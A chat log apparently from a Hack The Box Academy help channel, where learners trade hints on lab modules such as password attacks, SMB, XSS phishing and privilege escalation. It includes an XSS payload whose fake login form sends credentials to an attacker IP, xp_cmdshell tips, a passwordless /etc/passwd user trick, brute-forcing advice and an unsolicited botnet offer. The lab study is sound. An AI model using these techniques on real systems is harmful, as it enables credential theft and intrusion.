#modules

added

can someone give me a nudge on attacking common services - attacking smb? 'What is the password for the username "jason"?'

Me

Could someone help me on Attacking Common Services - Easy? Thx 🙂

did you found any cred?

found a user but brute forcing with the give pass list doesn't return anything and i've been trying rockyou but the machine runs out of time in the process @vital adder

what did you brute force and also use ||rockyou||

||SMTP|| so far and i'm using that

yeah you are in the right path and if you use ||rockyou|| the password should be in the ||top 100|| and also for the username you need to use the ||full mail address||

ohhh thank you man! 😄

Can I dm someone about the **AD Enumeration & Attacks - Skills Assessment Part I **? (below error)

Hey, working on server side attacks but I can't connect to the server, any ideas? I can tell that everything right

There must be a problem with your nginx conf file

i might be able to help

Are u sure? I Think that the problem is with the htb ip address

I get response with 127.0.0.1:80

Im having a problem with the Using Metasploit Module. I've set up my target machine with the proper exploit they want me to use but it just doesnt want to connect. Ive tried both the pwnbox and my VM via the ovpn to hackthebox and it just doesn't want to connect, can anyone help me?

EternalRomance. I tested a similar MS17_010 exploit with one of my other boxes in my VM lab and i was was able to shell in just fine, idk why this is a problem on HackTheBox

sure dm me i'll help you troubleshoot

any hint for what word list to use on module Attacking Common Applications section Attacking GitLab i found the user but can't find the password

hi there - i started HTB from scratch - and it seems that in the "Starting Point" Tier I the S3 bucket is not running. Is this going to be fixed?
obviously my hosts file is setup, but i get a 502 proxy error when attempting to use a browser to access that bucket

check out #starting-point

anyone know about cve-2022-31625 or cve-2022-31626 ?

Hello,
I got redirected to this channel.
I'm pretty new around here. I am currently going through the "Getting Started" module.
I'm stuck on the "Knowledge Check" section.
It is about ||GetSimple CMS v3.3.15|| and ||CVE-2019-11231||
I saw some conflicting statement in the Discord history so I'm wondering if the box tied to that section is still functional ?
I have the following error when running msf : Exploit aborted due to failure: unknown: IP:80 - Upload failed
Maybe I just missed something

can someone assist on attacking common services easy lab?
||can upload files to webserver, but I can't get my reverse shell right||

can any one help with CROSS-SITE SCRIPTING (XSS) :Phishing: having issues removing the image url element on the page?

check the directory that you output your shell it need to be in the same directory as the web server

yes, it works, but I can only issue commands like 'dir' etc. can't get a reverse shell

shoot me a dm i'll help you with this

for this you don't need a rev shell just run normal command no enum and find the flag in the admin desktop

alright thank you

My mistake was I put / instead of \ in the path... this actually cost me like 45minutes oh boy

😂

stuck on password attack hard lab, already found johanna creds and rdp to the machine.
found some .kdbx file, upload it on my attack machine and crack the pass to find the
masterkey...can't find anything else after that. any hint?

did you find ||david|| cred in keepass ?

yessir

if you do a nmap scan you will find some service on that box and one of that service will accept that user cred

Let me double check ...

I would love to know how you got the page to display correctly. I could never clean up the extra characters.

this isn't as much code at i remember so for the payload at the end use <!--'); instead of ;document.getElementById('urlform').remove(); so at the end of the payload it should be **"Login"></form><!--');

also this doesn't affect anything but for fun you can still add an icon

Hi I’m stuck at in the FOOTPRINTING module DNS... anyone can help me?What is the FQDN of the host where the last octet ends with “x.x.x.203”? I did dnsenum --dnsserver 10.129.132.192 --enum -r -p 0 -s 0 -o subdomains.txt -f ~/htbAcademy/jpt/wordlist.txt inlanefreight.htb and ran the same on every ns a soa i found but no luck. wordlist is the one from seclist.

did `dig axfr inlanefreight.htb @10.129.132.192' and everything found after that like axfr mail., axfr dc1. etc

I had document.write('<h3>Please login to continue</h3><form action=http://10.10.14.185><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>)';document.getElementByid('urlform').remove();<!--

can someone give me a nudge on a foothold for common services - medium lab? can't find any username/creds

Have you tried to mount the shared drive/folder?

oh i mean without the ;document.getElementById('urlform').remove(); just <!--'); so your payload need to be

document.write('<h3>Please login to continue</h3><form action=http://10.10.14.185><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form><!--');

I will go back and try to add '}; and see if that fixes it

do a ||full port scan|| and enum the highest ||port||

thx 🙂

tried the creds on all services found but am getting access denied, am i missing something?

did you try ||smb||

yes i did, getting access denied

so you use ||david|| cred on the in the ||smb|| and still get access denied and which share did you try to access

the one with the same name as user, actually all of them

yes that's the right share can you access that?

HTB makes me wanna cry. finally figured it out but took way too long for this.

htb give me brain damage

i'm on the last brain cell

still can't access, session setup failed: NT_STATUS_ACCESS_DENIED

Shoot me a DM with the command that you use

HTB challenges my perseverance

anyone for a nudge on common services - hard?|| impersonated the user but stuck now, getting an error when trying to communicate with the remote db||

use ||double single quotes|| if your command have to part so i you run ||EXECUTE('xp_cmdshell ''dir''')|| you need to use ||double single quotes|| but if your command one have i thing like ||EXECUTE('select @@version')|| then you don't need to use that

can I dm you? not sure if i'm missing smth

https://www.youtube.com/watch?v=wXkyKnKvShY

sure

can anyone help im trying to launch Parrot OS on a VM but its not in the options

did download the parrot iso and create a new linux vm with that iso?

There is only an option for linux no parrot os, or iso. I have no idea how to download the parrot iso. I do have parrot OS installed and on a virtual disk somehow

just search about this on youtube there video show you how to setup step by step

I think I installed it wrong because there is nothing in the virtual disk that says parrot OS,

followed a step by step guide on youtube and it still didnt find the OS

finally finished both of the Skills Assessments still need help with this section

and also can i dm someone about this moudule cheat sheet my look like it missing some stuff

You need help with attacking common services?

nope Attacking Common Applications

sec let me check my notes

try using ||cirt-default-usernames.txt||

oh i found the user but can't find the password

i dont have anything on bruteforcing the password

but its a simple password

yeah i get that part but can't find a word list have that password

is that password in rockyou?

it should be yes

if you run into issues DM me

So I was able to get Parrot OS onto it but now when I set it up and install it, instead of going to parrot OS when it restarts it goes to grub and disables the keyboard.

@tender marlin Is it your first time using parrot os

What help do you need?

ffs i was doing the same thing kekw

😂 i spent alot of time on that

So at the XSS module phishing part i keep getting the "Issue in sending URL!" like many others before, even with a payload posted earlier my own payload and the one posted earlier both work when i test them, however i can't send it to the "victim".. any ideas what could be the problem? Tried both url encoded and not url encoded and once again, works when i test it, probably would work if the "victim" would accept and use it but i guess the bot is finding smthn it doesn't like with it because it rejects it

hope this is not an issue with the exam later because that would be very frustrating 🙃

virtualbox?

hi everyone , i am currently stuck at the module Web Attack - Bypassing Security Filters , I have tried quite a lot of different HTTP Verbs like POST,PATH,UPDATE,PUT,DELETE ,OPTIONS and using url encode but only get the message "Malicious Request Denied!" Can someone please suggest me ?

Hello, I need some help on the Attacking Common Applications module - Skills 1; On the tomcat application I can’t find the manager or host-manager, also tried the ghost at exploit but didn’t get something useful…what am I missing, any hints?

Search for a CVE for this Tomcat version

Is it the Open redirect? I did search for CVEs there are 3 on exploit db but not sure which and how to use them. I tried but I might have made a mistake

DM

Has anyone had issue connecting to the VPN I can't get it to run and say initialization complete.

Hi there guys! Could someone please give me a nudge on Credential Hunting in Linux? I may be doing something wrong

in passwd attacks module?

if so DM me

dm me

can someone assist with remote/reverse port forwarding with ssh? pivoting module, my pivoted meterpreter session closes instantly

Hello, I am stuck on the Stack-Based OVerflow Linux x86 Skill Assignment. I got a working shellcode in gdb but when I try it outside it not working 😦

nvm found my mistake

can someone please give me full list of thing we can do with the file

/etc/passwd```

Mostly used for checking users on a linux system

suppose you've write permission to that file you can add your malicious user in there and leave the password field blank with an x and do some serious damage...

@worthy yoke alright I finally figured it out and got Parrot OS running on my VM, and Thanks jnvk for helping me out

Could I have help with Linux Buffer Overflows Skills Assesment?

@zealous fiber also needs help with this skills assesment

So I am having a bit of a struggle in the Password Attacks Module. I am using crackmapexec winrm on the target box, with the provided username.list and password.list, but when I hit enter it pauses for a second and then just returns me to the terminal prompt. No output or errors or anything.

not sure if it is the cause of your problem, but make sure you have the latest version of crackmapexec. Ran into a bunch of problems with it doing the same stuff and just needed to update it

Heard, I'll check

@dire sentinel Seems to be happening with both 5.2.2 and 5.3.0

what question are you on? feel free to DM

Found out what the Problem was. Pm me

Got it.. thanks

Anyone who has done the web attacks module, did you use the curl method? or the bash script? if so what regex did you use? I have done this module using burp but I want to understand the other method as well.

So now I'm having problems with hydra and smb in Password Attacks. I keep getting Invalid Reply from Target

DM me @vale salmon

did you get it?

can anyone point out what am I missing: I start the nessus service with " systemctl start nessusd.service" then I am giving option to choose from multiple identities, I chose the htb-student and type the password. I do get the Authentication Complete followed by "Failed to start nessusd.service: Unit nessusd.service not found." (even tried "nessus.service")?

you have to sign up for nessus

this is in the pwnbox, do I still need to signup?

yes, nessus is a service provided by tennable. You have to sign up with them to use it on any system

that is odd, shouldnt the pwnbox be already registered cause i did get a username and password from the module

nope, doesnt quite work that way im afraid.

thanks, much appreciated

hello friends

hi there jared...

hi, anyone who has completed the SSRF skill assessment can share a hint with me..!!!

I'm complete stuck

can somone give me a nudge on the pivoting skills assesment? whats the best way ||to transfer the lsass dump to my host||?

or did you try transfer ||mimikatz|| on the target machine

omg I did not know I could do this but I just found about this..
if anyone wants an easy way to transfer files with xfreerdp just add /drive:SHARE,/home/kali as arguments when connecting. Maybe it was obvious but I didn't know this. This is lifechanging

thx, I will try that method as well 🙂

How those last 2 modules treating you?

i am taking it easy from modules

i am teaching a networking class next month so just going over the course work

and even though i troll compTIA hard i kind of want to get network+ for the lulz

Do you teach CCNP ?

naw its just general networking'

we do stuff with packet tracer though

I'm tired of the network at the company, sometimes it disappears for unknown reasons

good evening

hey bb

Hi everyone!
Who can help me with the "Windows Privilege Escalation - Vulnerable Services"?
I can't get a reverse shell on my netcat listener.
I saw a picture of @west canopy . I have the same one exepted the needed shell. The shell.ps1 seems to be edited correctly as well. The Scope in the Bypass state.

m

obanganga?

i am stuck at command injections module, Bypassing Other Blacklisted Characters, could someone give me some help on it please

i am not able to figure out the syntax needed

Did you try encoding?

should I use URL-encoding?

yes

so first ${LS_COLORS:10:1} for semicolon and then the encoded command or the whole thing encoded?

Follow the principle of an example in this section while constructing the command you need. Use Burp.

thanks for the help, I will continue

quick confirmation, is "127.0.01; ls /home" correct syntax for the task?

Not yet but you are moving closer

i mean that is in the raw format without any attempt to get it through the filters

just trying to make sure that I am not facing two issues simultaneously

File Upload - Skill Assessment: Could I ask someon a question?
I think I have almost everything (source code, naming convention, regex filtering, ...) but I can't seem to get the MIME type right and I don't see what I'm missing.

feel free to dm me if you still have question

do you mean that the syntax is quite there or the syntax is correct but missing bypassing techniques / encoding?

Shells and payloads live engagement last server can someone dm me I have a few questions

Coul someone help me on Attacking Common Services - Hard lab?

feel free to dm me 🙂

Password Attacks -> Credential Hunting in Linux: Pretty stuck. Tried brute-forcing multiple services with provided username and credentials from hint. Any help would be appreciated!

Shells and payloads live engagement last server can someone dm me I have a few questions

Secure Coding 101: Skills Assessment -- Managed to get thru the other sections of this, and managed to get the first question in the skills assessment, but absolutely, positively, utterly LOST on the rest of the skills assessment... Is there a Secure Coding 99 or 100 that someone can refer me to by chance so I can complete this? 😅

EDIT: Holy hell, I actually got the second, third, and now fourth questions in skills assessment solved as well... final one -- patching...

Having trouble with this too.

General question here:
When I run

gobuster dns -d http://whatever.url -w /usr/share/dnsenm/whatever-the-filename-is.txt

I seem to lose my VPN connection after a few minutes. Am I missing something here? Is HTB just shutting off that connection to protect against some kind of nefarious activity? I know that I could use ffuf or similar, it just seems weird that I don't have problems if I run a gobuster dir command, but do have problems if I run a gobuster dns command.

HI

someone knows how to scalate privileges in the Getting started | Knowledge Check? I tried a lot of things

Hey everyone, I had a question. I got done with the *Service Scanning * section on Getting Started and we ended up using bob's credentials. I was curious as to how we got bob's credentials?

.......

Like, I understand we used smbclient to see what types of shared folders were listed and that there was a non-workgroup labeled users. But after that the documentation just states to use bobs credentials..? I was just curious as to how they were able to actually view the creds and knew how to use them.

https://www.ionos.com/digitalguide/server/know-how/server-message-block-smb/

its always the anime profile pictures bro

always.

jesus christ what are you feeding your arms man

can someone explain to me what is flag

find flag - what is it and how we can find with curl

it will be a text file called "flag.txt" , you must find its location and read it's contents

hence "capturing the flag"

for example its says , use this url and find the flag

how can i find with curl

been stuck 2 days

which module/section are you on?

http methods and cods

hack the box mudoles

GET section

1 sec homie i got you

love u mate

Anyone have success in the IMAP/POP Footprinting module. Stuck on the last question. I'm able to login to the IMAP server, Select the "INBOX" and now I'm stuck with fetching the messages within this inbox. Any insight would be greatly appreciated

Every fetch command I get an error. I know my syntax is off but still have no idea what command to issue to retrieve the flag

Dm me

that one is tough! need more than what is presented in the module. try googling imap/pop3 commands and try out different combinations of what you find

hey guys, i need help, any one?

Where you at?

i just wanna know what machines should i go through when im done with some modules ?

I guess it depends on the modules you’ve gone through

But even though you can try easy machines

And use maybe guidance from YouTube

At the end of certain modules, machines are listed which you could then solve.

i dont see any suggestion for machine after im done with the module thats why im asking

all i can see is "Suggested Modules"

Which modules have you solved so far?

wait... i think you're right, i've been doing modules i didnt notice that it suggest for machine its like not every module has machines to do

thank you i need to go back for all what i did 😦

I'm having trouble with this HTB challenge

can someone help me without giving me to answer

@everyone

pm me

Could I solicit a nudge/DM from either yourself, @knotty hemlock , or anyone else who has completed the Secure Coding 101: Javascript -- Patching Skills assessment? I deciphered the code, and (I would argue successfully) have identified and patched 2 ||sanitization|| vulnerabilities in the script, but upon submitting, it always errors out. Depending on how I choose to modify it, either (a) that the function that needs to be run is not, (b) that parameter validation failed, or (c) error while running code ensure runs with node file.js [which it does just fine]. Going absolutely insane on this one...

^ yes if anyone wants to carry me through the second half of Secure Coding, i am accepting volunteers 🙂

DM me -- I can (sorta/kinda) carry you thru all but that final question where I'm at a total loss... I say sorta/kinda as I managed to fumble my way thru it

Awww thanks bud! I might take you up on that in the future if thats ok

No worries, sounds good. Will say that if you go back to re-read/re-review the appropriate section(s) with a fine-tooth comb, it starts to make sense (kinda). Enough at least that I again managed to solve everything (but that last question on skills assessment). NOT easy, had numerous windows open (thank goodness for dual large monitors).

I think i am on custom decoder right now

but i have the javascript all unpacked and i have a bunch of variables renamed to something more human readable

so i am thinking it should be smooth moving forward

And i skipped ahead and did the first question of the Skill Assessment because it was low hanging fruit

Hola alguna habla español? Recién estoy empezando:’)

How to have a role

Need to verify in one of the bot channels i think, using a key from your actual hack the box account

There are other vulnerabilities that need to be patched as well. If you get the validation error then you're on the right track and need to patch that vuln

damn LFI skills assessment

Hi. I'm stuck on "Attacking FTP". I've found a first user/password which give me access over FTP and SMB and then SSH. I have the name of the second user but was not able to bruteforce the password using the given list. Any hint ? Thanks,

what format is the password hashed in ?

I'm a tad stuck on Password Attacks/Finding the Credentials for MySQL. Not sure where to start with the credentials I currently have. Maybe a nudge the right way?

Hi all, have a question on the HTTP module. Question asks to use cURL to download a file from 'the server shown above'. Is that the server in the examples (inlanefreight.com) or a server in the terminal or something else? Thanks for the help.

Never mind - sorted it. Pays to read instructions.

Hello I'm pretty new here

Hi

Is there a standard way to let kerbrute just output all enumerated users into a file One per line? Like valid_users.txt?

Maybe I'm just blind

Could anyone possibly nudge me in the right direction on Password Attacks - Default Credentials? I am not entirely sure how to use the previous credentials to snag the MySQL credentials, especially since MySQL seems to not be running.

Did you try to connect "locally" to MySQL ?

hello, I'm really stuck with SSRF skill assessment, anyone who can give me a hint..!!!

I tried, but the credentials I'm logged into the box with don't work for it and neither do the three default options I found for MySQL

Did you use https://github.com/ihebski/DefaultCreds-cheat-sheet ?

Yeah, that's where I found the 3 defaults for MySQL

One of the three works for me 🤨

What section in password attacks?

Hmmm. Maybe my command is wrong then. I am using|| mysql -h localhost -u <username> -p<password> mydb||

The Default Credentials section where you have to find the MySQL credentials

Try mysql -u <username> -p

Agreed

Ah hah. I was using the command wrong. I really need to put STOP OVERTHINKING! in bold in my notes. 🙄

anyone who can share with me a SSRF skill assessment hint

Im still confused to what this even is

Hi, did you manage eventually to find the flag ? I've managed to find the r user after getting the ssh access with the j user. No luck bruteforcing the password with the given passwords lists.

Can anyone help with intro to assembly?

which section?

Off top of my head unsure, but I generally like to tee things like that, and then once done, grep the output for what I'm after.

"Attacking Common Services / Attacking FTP

yeah for some reason in my note i wrote something change and the flag is in the ||ftp|| and you just need to login as the user r and get the flag

i think before in the ftp there is a ssh key and you have to use that to login via ssh and get the flag and i just try the flag is in the r user ||ftp||

the ssh key if for the j user in the SMB section

and it's not working for the r user

i don't see any about a ssh key in the smb section for that section after you got the cred you can just login via ssh and get the flag

shoot me a dm i'll help troubleshoot

I was trying to grep it but couldn'get get the syntaxt right

In the AD Enumeration Module it says "Windows Defender (or Microsoft Defender after the Windows 10 May 2020 Update) has greatly improved over the years and, by default, will block tools such as PowerView. There are ways to bypass these protections. These ways will be covered in other modules."

Which module covers this? Or is that module not out yet?

not covered yet

OK

Hi! I’m new here and im a beginner. I’m stuck with the first lab in Sqlmap essentials, the Case4 (last question). Anyone know how to do it? if yes dm please 🙏

I love it when the modules foreshadow

In the future we should be getting an OSINT staff investigation module

Anyone knows a machine without a webserver? then pls tag me. Thanks

as far as "recent" machines i really enjoyed Timelapse

Okay, I'm struggling a bit on the Credential Hunting for Linux in Password Attacks. I can't login with the credentials for Kira via any service so far as I can tell, I can't seem to bruteforce credentials for will. Not sure what I'm not doing.

@vale salmon try using a mutated version of|| LoveYou1||

Ah good grief. I knew I was forgetting something. 😅

thanks!

Lil stuck on Password Attacks Lab Easy. Able to ssh with a user, thats about it

A nudge would be appreciated 🙂

try to check some files, make sure|| to list all files ||

This module is kinda making me want to beat my head against the wall. How am I supposed to get access to /etc/shadow without root? (Password Attacks: Passwd, Shadow & Opasswd)

do what @copper creek said above 🙂

🤦

Is hashcat supposed to take like 40 minutes for one hash?

Don't recall for it to take that long in that module

Hmm. Did you use rockyou.txt as your wordlist?

Afair barely used rockyou, mostly the provided list or the mutated one

Specifically, I'm using hashcat on the unshadowed hashes. If I do the whole file, it tells me almost 4 hours

Just the hash I want is roughly an hour

I'm going through Windows fundamentals module again, and I noticed somewhat of an issue in 2nd part of it "Operating System Structure"... not sure if anyone else has ran into it, but the non-standard directory it asks for is non-existing, as there is one with different name than what is an accepted answer

the non-existing dir which exists there is ||75<REDACTED>02|| whilst the accepted answer is ||c8<REDACTED>75|| (not sure how much I'd be allowed to show here, so if it's too much I'll remove it)

Attacking Common Services | Attacking SMB --> I've used the password list from the resources. Nothing.

used jason.. Do I have to mutate the password list. Im going to attempt capital J

Resorted to using metasploit instead of crackmapexec. Not sure if that is intended or not, or even what the difference is

guys is signing in hackthebox website safe ?

cuz i have been scammed in the past a few times

for what its worth I signed in earlier today and i'm ok

ok

one more thing is it necessary to have 16 or 8 gb ram if we are using hackthebox website hacking lab?

ya u should be good

if i use 4g ram

is it good

if you are running a vm that might be cutting it kind of close

but if you are using just the browser/pwnbox its probably ok

ok

thnx

Is there a better way to crack the unshadowed hashes from the Password Attacks: Passwd, Shadow, & Opasswd section than using hashcat or john? john says it'll take over an hour and hashcat gets exhausted no matter what password list I use.

it takes forever

That's unfortunate

Is Python a good option for bug bounty hunting, exploit dev, wireless hacking, network hacking, SE pentesting, OSINT, etc?

Because I get conflicting reviews. I started this Python course and really like it

Would C/C++ be better? A lot of people say Python is best choice for cybersecurity but I hear some people say C/C++ is better

Can someone help me with the Active Directory skill assessment part II?

@quasi wave I'd say you should start with Python since the learning curve is easier and then it will be easier to learn C++ if you end up needing it.

Python is considered the standard for cybersecurity imo

Hi, I have problem with ATTACKING COMMON SERVICES -> Attacking SMB. I can get the credentials for jason, but I can not login to ssh, since I get jason@10.129.210.195: Permission denied (publickey).

Why use a saw (c/c++) to slice the bread when you can do it efficiently with a knife (python). Low-level stuff needs the knowledge of Assembly and C/C++.

@shadow orbit try to login smb

solved it.. thanks

Hi guys.

should i just learn all the modules

from the first to the last tier in order

Need help on windowx x86 buffer overflow - fuzzing parameter. I found the offset and tried everything and got also the length of A until it crashes

It ask for the smalest payload size. But when I enter the size of the smallest payload it dosent count? What am I missing?

I would focus at one thing at a time

I am just starting out and i was wondering if you guys can give me some tips on where and how to start? i want to be a redhat hacker i have a problem knowing where to start

If you want to learn a programming language definitely start with pytthon

can somebody tell me which userlist i should use and on wjich target on question 4 or the second skill assessment in Active Directory?

I love this quote from the user data in the Web Attack section "A fool with a tool is still a fool. Always have a goal, a plan & the tool as the enabler." :3

@barren oak what redhat?

can i get a nudge for logging into mssql in attacking common services? Not working any which way i try it with the credentials given.

oath is so broken 2fa is the reason accounts get hacked

I have a problem with the WEB REQUESTS module
under HyperText Transfer Protocol (HTTP)
in the first and only task I can not understand what I do wrong
I can download the right file, but what to do next I do not know
Please help me

Did anyone who did Password Attacks: Protected Archives have issues cracking the hash on the Zip Archive? I've tried zip2john, hashcat, and fcrackzip and had no luck.

For Starting Point: Responder, I'm not getting a response when I run Responder. I'm running Kali on a virtual machine and have a eth0 address but no tun0 address

@vocal parcel maybe check out #starting-point

@vale salmon i was able to crack it fine with john and ||mut_password.list||

try sqsh -S 10.129.89.37 -U htbdbuser -P 'MSSQLAccess01!' -h

If i told you that I've been doing that the whole time and for some reason I just NOW noticed i was missing a the b in 'htbdbuser' you would probably be disappointed right?

https://tenor.com/view/batman-slap-robin-slap-gif-10206784

but think of how much you learned

LOL

🙂

I was doing this last night, and went right back after it this morning, and decided to stop and watch football before I drive myself insane, and i just now noticed

i guess the lesson learned is don't forget some breaks haha

ya when i am tired i start overlooking simple stuff

Yeah, I finally realized I was using the wrong password list

Could someone clarify the wordlist to use for Passwd, shadow & Opasswd for Password attacks for the shadow root hash? I've tried the obvious small ones with no results and rockyou is taking a while.

@arctic acorn should be able to crack it with|| mut_password.list||

Haveing a bit of a issue on a hash word list combination attack

The module is combination attack

I see i am useing the wrong word list

im trying to do the pivoting module, Double pivots section and it looks like the proxifier website is down, anyone have this problem and or solution?

Thanks for the quick reply, didn't think we still had to use that one.

Can anone tell me what is wrong with the command i am typing. Its the mask attack section

@mystic fern if u send me a screenshot i can take a look

Anyone around here completed the File Upload assessment I can bounce some ideas off of?

This is where I am stuck? Did you get passed it?

Seems like I'm not the only one getting stuck here. I have interrupted a valid POST request and modified it by inserting php code after the magic byte (I've done this for both PNG and JPG file types), I am bypassing all of the filters, including the MIME type actually. I can see the file on the remote server, but the php code is not being executed. I have tried many different php file extensions as well:
.pht, .phpt, .phtml, .php3, .php4, .php5, .php6, .php7, .phps, .phar
Nothing seems to work! And I absolutely know I am overlooking something very silly and stupid. Because that;s just how I roll....

NVM, I tried harder......

That's 3 days of my life I'll never get back, and it was something stupid. 🙄

It's like when I finally break down and get outside my comfort zone and ask for help, the answer just appears.

Alright, so I'm working the Password Attacks Easy Lab. I'm trying to use hydra to get any credentials, but it takes forever and my target timer ends up expiring, even if I refresh the target.

What am I doing wrong?

I am using the username.list and password.list provided in Resources

try attacking|| ftp|| and crank up the tasks so it runs faster 🙂

Past ||16|| tasks?

i think you can go up to 64 with no problems

Ah, word

I didn't realize I could bump the tasks that high. Thanks.

np!

Also, is it just me or does the Time Left for the target speed up when using something like hydra?

i dont recall that happening to me

how long have you been awake?

Lol, I just got home. I started with a fresh target at 90 minutes and in the span of 5 minutes it has dropped to 65 minutes.

I know my sense of time is a bit screwy, but it isn't that bad

haha i remember being up all night on the medium lab

but it was great because i had so many ideas and my mind was racing

Oh yeah, I was up until 2am this morning getting through the rest of Password Attacks

your mind was racing or it became a monkey mind like mine?

its hard to say

because even a monkey can write shakespeare

given enough time and entropy in the universe

i managed to solve it though

I have ADHD so I hyperfocus anyway

the hard lab had me stuck for a few days

I doubt that. Shakespare miind still hass some kind of focus

in this info age, i beleive we all have ADHD. paradox of choices and endless distractions

To some degree, yes, but I got a diagnosis as a child, so around 30 years ago.

This period of time just gives me plenty of things to hyperfocus on

You're lucky. In my society, mental illnesses are defined as possessions by some unhuman creatures. So we sort it out on our own.

Yeah, I feel very bad for everyone who grew up in a situation like that. I am exceptionally lucky, too, that ADHD is the only thing I have to cope with.

yup. Transcendence is rare emotion to experience these days

Thanks brb was taking nap n brakinh now have to go out thabk you

In order to use id_rsa for login to SSH, it's permissions have to be set to 700, yes?

i think 700 is for .ssh folder

Ah, excellent

Same but on the spectrum instead

Just because someone has issues focusing doesn't necessarily mean they have ADHD .

I have focus issues a bit but i dont think i am ADHD. I think i find it more of a task to focus on anything i am not passionet about.

Self discipline is rough man 😅

You have to have a lot of it if you like hacking

That's the damn truth

The problem with hyperfocus is that you constantly run the risk of burnout. That is where my struggle is.

so you mean monkey mind is not ADHD? whats the difference

Indeed i agree

and tunnelvision

Could I pick someone's brain about the Password Attacks Medium Lab real quick?

Also for the password attacks module, are we given a certain wordlist???

yes it's in Resources

sure shoot me a dm if you still have question about that

oh and a tip for that section is try to answer the first question after you get access to the target system take all of the username from there and use that as the username wordlist for the other question

For the first question did you use winrm or crackmapexec?

i think i use crackmapexec for winrm

@vital adder Did this happen to you?

try installing with gem
Edit: Disregard

or pip3

derpp for some reason i was thinking evil-winrm

Installed with pip. Weird, I swear I am using this tool right...

that's weird i try run the same command to test something out and it will not stop on success i don't know to make it do that

going to reset target. Maybe that will work

How long should I expect for crackmapexec to give me the password? The cracking on the hydra module was relatively quick

i would about 5-7 minutes maybe or maybe longer but i have no idea how to make it stop on success so watch out for that

with crackmapexec you can use --continue-on-success | grep '[+]', it will only show the valid creds found

but i need verbose and | grep "Pwn3d!" is better

Im back

Ugg this password attacks module is kicking my ass

I don't know if I am approaching things from the wrong angle, or if I am being too impatient with my hydra scans

Under the password mutations section, am I doing this right?

It sucks cause I 100% understand the theory

the password for that is over 17000 so...

what do you mean?

the password for that user is over 17000 word deep in the mutated wordlist

hi

if it is taking to long try to cut the first 17000 word

I can do a botnet stress test to people who are interested in security

On the getting set up module and it wont accept the right answer, It says "what does linux PAM stand for" I put in both Pluggable authentication Modules and Privilege access management and they both didnt work

There is a module that gives a recommendation for a program that can draw networks, does anyone remember what the mod or program is?

Do you mean draw.io?

One of those answers is correct, just make sure each word is capitalised.

Can someone help me with this question: Try to fuzz the program with '.wav' files of increments of 1000 bytes '1000, 2000, 3000...', and find the smallest payload size that crashes the program and overwrites EIP with '41414141'. On the Windows Stack Based Buffer Overflow module

I have the same problem. Did you get a solution yet?

Hi Guys, im stuck at Credential hunting for linux. i have tried bruteforcing several ways, still no lucks. HELP!

There's a a tool mentioned for a specific browser in the module. Try using it. I had to transfer the folder to my host and then use the tool there.

Hello together

I am currently on the Windows Fundamental course. In the section NTFS vs. Share Permissions I am supposed to mount to the share - with the following command:

sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //10.129.201.57/"Company Data" /home/user/Desktop/

But then I get the message
mount: /home/user/Desktop/: mount point does not exist

Next, I adjusted the path in the command:
sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //10.129.201.57/"Company Data" C:\Users\htb-student\Desktop

But the same message still comes up.

I have to add that if I get an error message I should install cifs utils with sudo apt-get install cifs-utils, but I also get an error message saying ackage cifs-utils is not available, but is referred to by another package.

Does anyone have an idea where I should start in order to get further?

TQ so much man, got it!

could anybody help me figure out the medium lab from the enumeration with nmap module in academy?
i've tried every possible flag with nmap but I just can't get the version of the dns service running on the machine

@pliant sage i had to use pwnbox to get the answer , i couldnt get it from my VM. feel free to DM if you need help 🙂

think about which protocol DNS is using and then try again

If you want, I can send you my walkthrough. It worked with my VM at the time.

(Login Form Attacks:) Have you been able to solve this by any chance? I have the same problem. Hydra finds the user:pass pair, but the login doesn't work. Am I missing something here?

Can anyone assist with the attacking FTP module? I've found user J and their password. I've also found user R but have been unable to bruteforce their password with provided/known wordlists. I can ssh with J but have been unable to find any clues for what R's password may be.

in which module are you?
Attacking Common Services?

Feel free to DM me

Yes, attacking common services

DM

Thanks man

Yo how long would it take for someone to start earning money via bug bounties

can you guys access https://www.tenable.com/plugins?

in the vulnerability assessment module I can't download the right tool

The PwnBox has no Internet connection as far as I know

I do it from my host

From here the page can be reached

idk I get a "no access" message when I try to access any subdomain

All the more reason not to register

What exactly are you trying to do?
When you enter the URL in your browser, the page is not loaded?

Which subdomain do you want to access and from where do you want to access it?

yes

I just want to open the site, preferably open the list of plugins, but I can't do either

even from under the console the site rejects requests

Is a firewall in your network blocking access? DNS resolves correctly?

yes, i check it

Could the problem be that I'm from Russia?

Anyone able to help me out with the medium footprinting lab? I'm hitting a wall

@plain coral I tried it for both and it didnt work, EDIT: I think there was a spelling or caps error cause it just worked

can anyone provide assistance. footprinting hard lab. found snmp is open and tried creating wordlists from NIXHARD and all seclists wordlists but no luck.

No idea which sites are blocked in Russia.

Yes, the site blocks any connection from Russia, cool
Anyway, thanks for your help.

did you try snmp walk?

where did you get stuck?

tried snmp walk with some public communities, then went on the onesixtyone to bruteforce from seclists

I need help is anyone free to help me with the hybrid mode section of the cracking passwords with hashcat module

Dm me

Can anybody help me please?

Im trying to change a meterpreter shell to a cmd shell using the "shell" command in the meterpreter session

but everytime it says |D-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:42893-<--denied

Weird, i've never seen that

can i DM you?

sure but i dont know if i have a solution for you haha

hi every one i m new here and i want learn hacking , can you help me

Is privacy a myth? If system was meant to be secured, enigma wouldn't have broken.

It's best to start with the simple modules (Tier 0) here in the Academy. If you have any questions, ask for help here in the chat.

ok tnx

can you explain to me well that I have no idea about it please

There is hackthebox.com and academy.hackthebox.com, both require their own seprate accounts.

https://academy.hackthebox.com/module/15/section/32

That is the "Welcome to HTB Academy" Module, should help get you in the right direction.

is it free

A few modules can be taken for free.

When you register you get 50 cubes and can unlock certain modules with them. When you have completed the module and answered all the questions, you get back a certain number of cubes. With this you can then complete further modules.

Hi everyone 😜👋 ... Web proxies mod there is question saying try to look for other flag in other directory ... I have checked all that directory but only one flag I got

check the ||root of the linux filesystem, ls / ||

I will show you what dir I have got

No such dir found

which directory is at the top of the linux file structure?

Tnx you jarednexgent.. you solve my problem 🏵️🌸🏵️🌸

i can't login in

help. footprinting lab hard. i am logged in as tom. any advise on what should be my path or am i down the wrong path

@sturdy igloo check and see ||what service(s) might be running locally on the machine... something like a database maybe?||

Thanks. Will start to check.

curious... anyone in here passed OSCP after using HTB academy? With practicing in the pwk and HTB too of course.

||Test ||

